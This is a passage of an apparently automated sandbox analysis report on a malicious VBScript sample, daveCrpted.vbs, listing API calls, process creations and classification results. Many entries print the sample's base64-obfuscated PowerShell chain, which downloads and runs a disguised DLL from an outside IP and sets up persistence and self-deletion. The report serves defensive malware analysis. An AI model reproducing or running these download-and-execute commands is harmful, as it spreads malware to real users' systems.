          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_031099D0 NtCreateProcessEx,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_03109820 NtEnumerateKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_03109840 NtDelayExecution,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_0310B040 NtSuspendThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_031098A0 NtWriteVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_031098F0 NtReadVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_03109710 NtQueryInformationToken,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_0310A710 NtOpenProcessToken,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_03109730 NtQueryVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_03109770 NtSetInformationFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_0310A770 NtOpenThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_03109760 NtOpenProcess,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_03109780 NtMapViewOfSection,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_031097A0 NtUnmapViewOfSection,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_03109610 NtEnumerateValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_03109650 NtQueryValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_03109670 NtQueryInformationProcess,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_031096D0 NtCreateKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_0310AD30 NtSetContextThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_03109520 NtWaitForSingleObject,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_03109540 NtReadFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_03109560 NtWriteFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_031095F0 NtQueryInformationFile,
          Source: daveCrpted.vbsInitial sample: Strings found which are bigger than 50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
          Source: daveCrpted.vbsReversingLabs: Detection: 12%
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\daveCrpted.vbs"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.232.4/dll/26-05-2022-StartUp.pdf'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ddscfIvqgW.HoNYlDROLP').GetMethod('Run').Invoke($null, [object[]] ('txt.kjihugfdst/22.75.65.2//:ptth'))
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Done.vbs
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden Start-Sleep 5;Start-Process C:\ProgramData\Done.vbs
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Start-Sleep 5
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Done.vbs"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.232.4/dll/26-05-2022-StartUp.pdf'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ddscfIvqgW.HoNYlDROLP').GetMethod('Run').Invoke($null, [object[]] ('txt.kjihugfdst/22.75.65.2//:ptth'))
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\explorer.exe explorer.exe
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\explorer.exe "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.232.4/dll/26-05-2022-StartUp.pdf'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ddscfIvqgW.HoNYlDROLP').GetMethod('Run').Invoke($null, [object[]] ('txt.kjihugfdst/22.75.65.2//:ptth'))
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Done.vbs
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Start-Sleep 5
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Done.vbs"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.232.4/dll/26-05-2022-StartUp.pdf'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ddscfIvqgW.HoNYlDROLP').GetMethod('Run').Invoke($null, [object[]] ('txt.kjihugfdst/22.75.65.2//:ptth'))
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20220527Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5dgawbhw.o05.ps1Jump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winVBS@30/28@2/3
          Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4364:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3020:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5640:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7100:120:WilError_01
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\daveCrpted.vbs"
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\explorer.exe
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\explorer.exe
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
          Source: Binary string: cmmon32.pdb source: RegAsm.exe, 00000009.00000003.572055079.0000000001124000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: cmmon32.pdbGCTL source: RegAsm.exe, 00000009.00000003.572055079.0000000001124000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000009.00000002.574613863.0000000002C5F000.00000040.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000003.469567195.0000000002810000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.574322688.0000000002B40000.00000040.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000003.471300384.00000000029AD000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: WAUgLeAhDG.pdb source: powershell.exe, 00000006.00000002.503711509.0000012FE07B0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.484215461.0000012FC8389000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: RegAsm.exe
          Source: Binary string: WAUgLeAhDG.pdbH|^| P|_CorDllMainmscoree.dll source: powershell.exe, 00000006.00000002.503711509.0000012FE07B0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.484215461.0000012FC8389000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: ddscfIvqgW.pdb source: powershell.exe, 00000006.00000002.483842645.0000012FC8286000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.490975728.0000012FC8CA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.503455529.0000012FE0190000.00000004.08000000.00040000.00000000.sdmp

          Data Obfuscation

          barindex
          Suspicious powershell command line found
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.232.4/dll/26-05-2022-StartUp.pdf'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ddscfIvqgW.HoNYlDROLP').GetMethod('Run').Invoke($null, [object[]] ('txt.kjihugfdst/22.75.65.2//:ptth'))
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Done.vbs
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden Start-Sleep 5;Start-Process C:\ProgramData\Done.vbs
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Start-Sleep 5
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.232.4/dll/26-05-2022-StartUp.pdf'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ddscfIvqgW.HoNYlDROLP').GetMethod('Run').Invoke($null, [object[]] ('txt.kjihugfdst/22.75.65.2//:ptth'))
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 